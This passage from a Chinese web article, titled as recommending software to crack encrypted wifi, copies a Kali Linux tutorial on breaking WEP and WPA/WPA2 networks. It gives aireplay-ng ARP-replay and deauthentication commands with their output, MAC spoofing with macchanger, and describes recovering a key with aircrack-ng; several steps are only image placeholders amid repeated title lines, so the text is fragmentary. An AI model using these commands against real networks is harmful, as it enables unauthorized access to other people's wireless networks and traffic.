专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上( 三 )

(7)使用aireplay发送一些流量给无线路由器 , 以至于能够捕获到数据 。语法格式如下所示:
aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]执行命令如下所示:
root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0The interface MAC (00:C1:40:76:05:6C) doesn\'t match the specified MAC (-h).ifconfig mon0 hw ether 00:11:22:33:44:5517:26:54 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1Saving ARP requests in replay_arp-0515-172654.capYou should also start airodump-ng to capture replies.Notice: got a deauth/disassoc packet. Is the source MAC associated ?Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 packets…(499 ppsRead 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packets…(499 ppsRead 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packets…(499 ppsRead 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packets…(499 ppsRead 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packets…(499 ppsRead 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 packets…(500 ppsRead 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packets…(500 ppsRead 3367 packets (got 1 ARP requests and 525 ACKs), sent 548 packets…(499 ppsRead 3687 packets (got 1 ARP requests and 576 ACKs), sent 598 packets…(499 ppsRead 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 packets…(500 ppsRead 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packets…(500 ppsRead 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 packets…(500 ppsRead 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packets…(499 ppsRead 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packets…(499 pps输出的信息就是使用ARP Requests的方式来读取ARP请求报文的过程 , 此时回到airodump-ng界面查看 , 可以看到Test的Frames栏的数字在飞速的递增 。在抓取的无线数据报文达到了一定数量后 , 一般都是指IVsX值达到2万以上时 , 就可以开始破解 , 若不能成功就等待数据包文继续抓取 , 然后多尝试几次 。
(8)使用Aircrack破解密码 。执行命令如下所示:

专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

从输出的结果中可以看到KEY FOUND , 表示密码已经找到 , 为abcde 。
9.2.2 破解WPA/WPA2无线网络WPA全名为Wi-Fi Protected Access , 有WPA和WPA2两个标准 。它是一种保护无线电脑网络安全的协议 。对于启用WPA/WPA2加密的无线网络 , 其攻击和破解步骤及攻击是完全一样的 。不同的是 , 在使用airodump-ng进行无线探测的界面上 , 会提示为WPA CCMP PSK 。当使用aireplay-ng进行攻击后 , 同样获取到WPA握手数据包及提示;在破解时需要提供一个密码字典 。下面将介绍破解WPA/WPA2无线网络的方法 。
使用aircrack-ng破解WPA/WPA2无线网络的具体操作步骤如下所示 。
(1)查看无线网络接口 。执行命令如下所示:
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

(2)停止无线网络接口 。执行命令如下所示:
【专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上】
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

(3)修改无线网卡MAC地址 。执行命令如下所示:
root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0Permanent MAC: 00:c1:40:76:05:6c (unknown)CurrentMAC: 00:c1:40:76:05:6c (unknown)NewMAC: 00:11:22:33:44:55 (Cimsys Inc)(4)启用无线网络接口 。执行命令如下所示:
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

(5)捕获数据包 。执行命令如下所示:
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

(6)对无线路由器Test进行Deauth攻击 。执行命令如下所示:
root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon017:50:27 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 117:50:30 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12|59 ACKs]

推荐阅读